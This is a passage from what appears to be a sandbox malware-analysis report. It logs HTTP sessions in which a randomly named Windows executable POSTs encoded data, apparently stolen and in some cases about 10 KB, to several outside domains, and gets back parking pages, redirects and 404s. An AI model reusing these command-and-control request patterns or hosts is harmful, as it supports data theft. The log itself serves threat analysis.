32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_koQhNginclKyeZVWSQlvt3YBpYFGwloCTvRxaX3DlI1QscUt/joeEDodpNf7x1k7ZlEyttj7ZFW/1zRS0UKTjw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 11, 2024 06:51:19.075403929 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTkzNTQ3MWItMzdiNC00OTQ3LWE2Y2UtYmU0NTE3OGRjMTYzIiwicGFnZV90aW1lIjoxNzMxMzA0Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49952	199.59.243.227	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:21.191828012 CET	529	OUT	GET /6yvy/?fZah6=fhdCm7QPgJWPZ057s64Ux5r/+BZivFIion+wLFyamRalFHuL34U2xPSs+rBZlbdbh9uPsXLFfNB9r2rL2d2sjvCbVXN57VFg+LFqSyLQYcizqp2CdTkuIG8=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.havan-oficial.online User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:51:21.610747099 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 05:51:21 GMT content-type: text/html; charset=utf-8 content-length: 1498 x-request-id: 32e0b1db-9fff-4f4a-b1fa-e43a0419e04d cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tmCt48CmpisTvMu38P7Nq/qQpvnpOfA2UsjOvWsoDlUmPOuCjW0UpmOIVTLEjbYCVM5FLZ30nayMZGb4F7bK1A== set-cookie: parking_session=32e0b1db-9fff-4f4a-b1fa-e43a0419e04d; expires=Mon, 11 Nov 2024 06:06:21 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 6d 43 74 34 38 43 6d 70 69 73 54 76 4d 75 33 38 50 37 4e 71 2f 71 51 70 76 6e 70 4f 66 41 32 55 73 6a 4f 76 57 73 6f 44 6c 55 6d 50 4f 75 43 6a 57 30 55 70 6d 4f 49 56 54 4c 45 6a 62 59 43 56 4d 35 46 4c 5a 33 30 6e 61 79 4d 5a 47 62 34 46 37 62 4b 31 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tmCt48CmpisTvMu38P7Nq/qQpvnpOfA2UsjOvWsoDlUmPOuCjW0UpmOIVTLEjbYCVM5FLZ30nayMZGb4F7bK1A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 11, 2024 06:51:21.610763073 CET	951	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzJlMGIxZGItOWZmZi00ZjRhLWIxZmEtZTQzYTA0MTllMDRkIiwicGFnZV90aW1lIjoxNzMxMzA0Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49993	3.33.130.190	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:26.670298100 CET	799	OUT	POST /eziw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.digitalincomenow.net Origin: http://www.digitalincomenow.net Referer: http://www.digitalincomenow.net/eziw/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 54 4b 6f 55 4b 71 35 4f 64 42 58 69 6f 67 4f 37 57 61 6b 61 6d 63 71 4c 48 51 78 55 41 41 41 67 36 4d 2f 30 59 55 72 2f 68 2f 65 68 5a 64 44 31 6b 34 52 6c 4d 74 4a 7a 32 32 77 51 38 69 73 51 41 4f 79 35 76 55 49 55 7a 71 75 48 38 48 56 59 74 56 61 36 6a 55 7a 2f 7a 37 4a 59 71 64 4b 65 5a 35 6c 79 2b 52 51 7a 5a 50 63 45 78 62 52 56 73 5a 73 75 52 34 4a 75 38 42 30 6d 30 49 50 33 36 78 39 4c 35 75 2b 76 6f 5a 37 6e 67 42 37 45 71 38 50 64 53 63 63 4b 34 43 64 31 77 73 31 4b 39 61 31 4f 52 51 67 6f 51 7a 36 51 6d 42 4b 6c 44 33 61 43 75 55 6e 48 66 59 37 5a 59 4a 34 76 4e 67 3d 3d Data Ascii: fZah6=TKoUKq5OdBXiogO7WakamcqLHQxUAAAg6M/0YUr/h/ehZdD1k4RlMtJz22wQ8isQAOy5vUIUzquH8HVYtVa6jUz/z7JYqdKeZ5ly+RQzZPcExbRVsZsuR4Ju8B0m0IP36x9L5u+voZ7ngB7Eq8PdSccK4Cd1ws1K9a1ORQgoQz6QmBKlD3aCuUnHfY7ZYJ4vNg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50014	3.33.130.190	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:29.218894005 CET	819	OUT	POST /eziw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.digitalincomenow.net Origin: http://www.digitalincomenow.net Referer: http://www.digitalincomenow.net/eziw/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 54 4b 6f 55 4b 71 35 4f 64 42 58 69 72 44 47 37 61 64 77 61 67 38 71 49 44 67 78 55 53 41 41 6b 36 4d 6a 30 59 56 2b 69 69 4e 71 68 5a 38 7a 31 6e 38 46 6c 4e 74 4a 7a 38 57 77 56 32 43 73 74 41 4f 2b 78 76 51 49 55 7a 70 53 48 38 47 6c 59 74 6d 79 35 78 55 7a 39 71 4c 4a 65 67 39 4b 65 5a 35 6c 79 2b 52 73 4e 5a 50 55 45 78 72 42 56 74 34 73 68 66 59 4a 68 71 78 30 6d 69 34 4f 2b 36 78 39 54 35 73 61 56 6f 62 54 6e 67 41 4c 45 71 6f 62 61 63 63 63 4d 6e 79 63 69 78 4d 67 57 34 37 49 55 5a 7a 45 37 59 67 6e 77 6e 48 48 2f 53 47 37 56 38 55 44 30 43 66 79 74 56 4b 46 6d 57 6e 6a 47 62 67 4c 4d 50 65 72 6f 61 35 4b 72 6f 49 45 6b 2b 65 73 3d Data Ascii: fZah6=TKoUKq5OdBXirDG7adwag8qIDgxUSAAk6Mj0YV+iiNqhZ8z1n8FlNtJz8WwV2CstAO+xvQIUzpSH8GlYtmy5xUz9qLJeg9KeZ5ly+RsNZPUExrBVt4shfYJhqx0mi4O+6x9T5saVobTngALEqobacccMnycixMgW47IUZzE7YgnwnHH/SG7V8UD0CfytVKFmWnjGbgLMPeroa5KroIEk+es=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50024	3.33.130.190	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:31.763895988 CET	10901	OUT	POST /eziw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.digitalincomenow.net Origin: http://www.digitalincomenow.net Referer: http://www.digitalincomenow.net/eziw/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 54 4b 6f 55 4b 71 35 4f 64 42 58 69 72 44 47 37 61 64 77 61 67 38 71 49 44 67 78 55 53 41 41 6b 36 4d 6a 30 59 56 2b 69 69 4e 79 68 5a 50 37 31 39 64 46 6c 4b 74 4a 7a 36 6d 77 55 32 43 73 38 41 50 57 31 76 52 31 76 7a 76 65 48 39 67 78 59 38 6e 79 35 72 45 7a 39 69 72 4a 62 71 64 4c 47 5a 39 41 31 2b 52 63 4e 5a 50 55 45 78 74 46 56 75 70 73 68 64 59 4a 75 38 42 30 36 30 49 50 58 36 78 46 44 35 73 4f 46 6f 72 7a 6e 67 6a 7a 45 6f 62 6a 61 44 73 63 4f 6b 79 63 71 78 4d 38 2f 34 36 6b 51 5a 79 67 56 59 6e 50 77 6a 53 71 42 57 30 6a 59 6a 53 4c 39 66 4e 54 50 64 4b 38 71 66 47 72 2b 58 46 4c 58 56 38 33 69 65 59 58 53 73 36 55 45 74 61 5a 6d 35 41 7a 46 39 67 6c 68 65 64 32 37 7a 51 6d 63 44 4a 66 44 72 5a 2f 67 37 32 70 6d 45 39 6f 65 51 68 4c 56 53 75 48 62 37 76 58 45 69 44 30 53 51 70 74 35 4d 63 4c 51 61 46 55 73 6d 6b 4b 46 44 44 4d 56 74 42 69 6b 6e 30 6e 73 30 68 7a 67 68 52 4a 34 33 4f 72 48 4a 4b 73 59 41 33 59 67 66 6a 32 51 63 50 41 45 48 64 46 78 4e 38 6f 64 5a 36 51 2f [TRUNCATED] Data Ascii: fZah6=TKoUKq5OdBXirDG7adwag8qIDgxUSAAk6Mj0YV+iiNyhZP719dFlKtJz6mwU2Cs8APW1vR1vzveH9gxY8ny5rEz9irJbqdLGZ9A1+RcNZPUExtFVupshdYJu8B060IPX6xFD5sOForzngjzEobjaDscOkycqxM8/46kQZygVYnPwjSqBW0jYjSL9fNTPdK8qfGr+XFLXV83ieYXSs6UEtaZm5AzF9glhed27zQmcDJfDrZ/g72pmE9oeQhLVSuHb7vXEiD0SQpt5McLQaFUsmkKFDDMVtBikn0ns0hzghRJ43OrHJKsYA3Ygfj2QcPAEHdFxN8odZ6Q/JrJd59hUV/PSADypBy/lK5dHT7k30YhzFnl/4M0GDnDYoog3WP94NbdOl4ZlbBTcNxDy9Ul3qtcUDpGLgC3HqrFfbFDgDVOUAQPA4nJ/Rw5LV5pILe8+7Y5IIe7DoanLIXTxjEa14C0G6Chp+aF1zoRmHrp0u308vCkOMTYsFt1JZWYSOXypZ2TFTw3ykf7i3XuVSCfwIb6Qu4j8VvPAA+gEHGaU+XSgEqWvFYLNlQ5XMIqkveJAez1aCoeqF602DLPatJPacV+OrlZWPKatVkedEqpQDRw7k/O+KbFKT0M2gu89cvNCi71fLbYzeyRRxuJEBOQFq2nSzsO6qcxmDG8jPuFLOeGQc1dNqqaTGvlWD/BQQe0YtHu2CLTSWpyMYZSAxTx8sQcgFeKjl4T/sHE92qVlvw+bKj2hI3TjUwdMswvr7GRpZOyO3oF+UdTHwfdz7XjkWGJjt2c+bf806oQtXs6jQOwr9ktwTr3f1t6YakWw+jr8kR3Xsu+hfw9zqMCCq9ajPDjwjpaCIFh19F9wU7jRaSLHKsX2gkCyqhtp1vxoPra+J/LCHgNZ4Vig/v3rUMoW+Pjrs9vtUa9kJmh6z2JLSk6qrTpIVX27KZ1CcnpEgDEAt639uY0C3nrzq+0eCdgZg6gtnH3INHvJktBSwRyu+tzmaj [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50025	3.33.130.190	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:34.303607941 CET	529	OUT	GET /eziw/?fZah6=eIA0Jd5aMS2L7DX5fIIZoNagEXcpH0QKyJTSXVeeqMeXfMTLyOlbTsl/2ncp1mdFNMCAwgVL1bSg13wM91y9oVrWsMArp8Gmd60S1VkCFu8W6LIlsIwOfco=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.digitalincomenow.net User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:51:34.721667051 CET	403	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 05:51:34 GMT Content-Type: text/html Content-Length: 263 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 5a 61 68 36 3d 65 49 41 30 4a 64 35 61 4d 53 32 4c 37 44 58 35 66 49 49 5a 6f 4e 61 67 45 58 63 70 48 30 51 4b 79 4a 54 53 58 56 65 65 71 4d 65 58 66 4d 54 4c 79 4f 6c 62 54 73 6c 2f 32 6e 63 70 31 6d 64 46 4e 4d 43 41 77 67 56 4c 31 62 53 67 31 33 77 4d 39 31 79 39 6f 56 72 57 73 4d 41 72 70 38 47 6d 64 36 30 53 31 56 6b 43 46 75 38 57 36 4c 49 6c 73 49 77 4f 66 63 6f 3d 26 34 32 54 38 66 3d 41 42 77 68 30 6c 41 48 64 4a 6e 58 4d 42 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fZah6=eIA0Jd5aMS2L7DX5fIIZoNagEXcpH0QKyJTSXVeeqMeXfMTLyOlbTsl/2ncp1mdFNMCAwgVL1bSg13wM91y9oVrWsMArp8Gmd60S1VkCFu8W6LIlsIwOfco=&42T8f=ABwh0lAHdJnXMBd"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50026	162.0.211.143	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:39.949613094 CET	769	OUT	POST /woqs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.qadlo.life Origin: http://www.qadlo.life Referer: http://www.qadlo.life/woqs/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 39 67 37 4b 46 32 32 6a 51 34 35 59 30 70 39 52 4c 57 74 56 6a 55 69 55 66 6a 56 53 62 63 39 2b 2b 72 47 48 6d 64 2f 61 66 54 6c 6c 36 6b 68 42 58 58 32 34 71 50 61 75 58 4c 56 56 50 4f 73 70 37 46 57 59 76 71 44 45 38 77 56 55 46 54 44 35 34 49 70 68 42 54 6f 30 6c 38 74 72 45 37 7a 67 46 44 79 74 68 4b 39 63 50 6d 44 48 64 5a 30 47 4f 73 6d 58 66 51 65 35 75 69 72 6f 52 37 6a 56 38 39 34 47 55 45 4e 31 45 71 58 45 4f 43 46 74 52 2f 6e 74 6f 33 59 46 6d 44 77 4c 72 64 2f 42 63 33 6c 62 72 71 43 36 57 6f 71 33 45 39 36 6b 59 53 68 2f 51 46 36 36 4b 36 6d 74 6b 6f 66 50 4d 41 3d 3d Data Ascii: fZah6=9g7KF22jQ45Y0p9RLWtVjUiUfjVSbc9++rGHmd/afTll6khBXX24qPauXLVVPOsp7FWYvqDE8wVUFTD54IphBTo0l8trE7zgFDythK9cPmDHdZ0GOsmXfQe5uiroR7jV894GUEN1EqXEOCFtR/nto3YFmDwLrd/Bc3lbrqC6Woq3E96kYSh/QF66K6mtkofPMA==
Nov 11, 2024 06:51:40.506824017 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 05:51:40 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50027	162.0.211.143	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:42.494405985 CET	789	OUT	POST /woqs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.qadlo.life Origin: http://www.qadlo.life Referer: http://www.qadlo.life/woqs/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 39 67 37 4b 46 32 32 6a 51 34 35 59 30 4a 4e 52 49 33 74 56 30 6b 69 58 42 7a 56 53 52 38 39 36 2b 72 4b 48 6d 63 4b 48 66 68 42 6c 36 46 52 42 57 53 57 34 70 50 61 75 63 72 56 55 41 75 73 6d 37 46 72 6e 76 72 2f 45 38 77 42 55 46 58 50 35 2f 2f 64 69 42 44 6f 68 74 63 74 70 4b 62 7a 67 46 44 79 74 68 4b 42 32 50 6d 62 48 65 71 73 47 66 34 4b 55 52 77 65 2b 35 53 72 6f 61 62 69 39 38 39 34 6b 55 46 42 62 45 6f 76 45 4f 44 31 74 51 75 6e 75 6a 33 59 35 35 54 78 6e 6c 4d 44 4f 61 31 59 49 6c 5a 58 66 56 4b 71 68 49 62 33 2b 4a 6a 41 6f 43 46 65 4a 58 39 76 5a 70 72 69 47 58 49 43 46 34 33 36 67 54 2f 37 67 6e 59 57 44 58 75 6d 31 36 75 63 3d Data Ascii: fZah6=9g7KF22jQ45Y0JNRI3tV0kiXBzVSR896+rKHmcKHfhBl6FRBWSW4pPaucrVUAusm7Frnvr/E8wBUFXP5//diBDohtctpKbzgFDythKB2PmbHeqsGf4KURwe+5Sroabi9894kUFBbEovEOD1tQunuj3Y55TxnlMDOa1YIlZXfVKqhIb3+JjAoCFeJX9vZpriGXICF436gT/7gnYWDXum16uc=
Nov 11, 2024 06:51:43.098710060 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 05:51:42 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50028	162.0.211.143	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:51:45.043553114 CET	10871	OUT	POST /woqs/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.qadlo.life Origin: http://www.qadlo.life Referer: http://www.qadlo.life/woqs/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 39 67 37 4b 46 32 32 6a 51 34 35 59 30 4a 4e 52 49 33 74 56 30 6b 69 58 42 7a 56 53 52 38 39 36 2b 72 4b 48 6d 63 4b 48 66 68 4a 6c 37 32 4a 42 51 30 65 34 6f 50 61 75 41 37 56 5a 41 75 73 2f 37 46 43 75 76 72 7a 79 38 79 35 55 44 45 48 35 2b 4b 78 69 50 44 6f 68 68 38 74 71 45 37 7a 78 46 44 69 70 68 4c 74 32 50 6d 62 48 65 74 55 47 50 63 6d 55 54 77 65 35 75 69 72 30 52 37 6a 51 38 37 52 5a 55 46 55 75 45 59 50 45 50 6a 6c 74 54 63 50 75 68 58 59 42 34 54 78 2f 6c 4d 4f 4f 61 31 55 45 6c 59 53 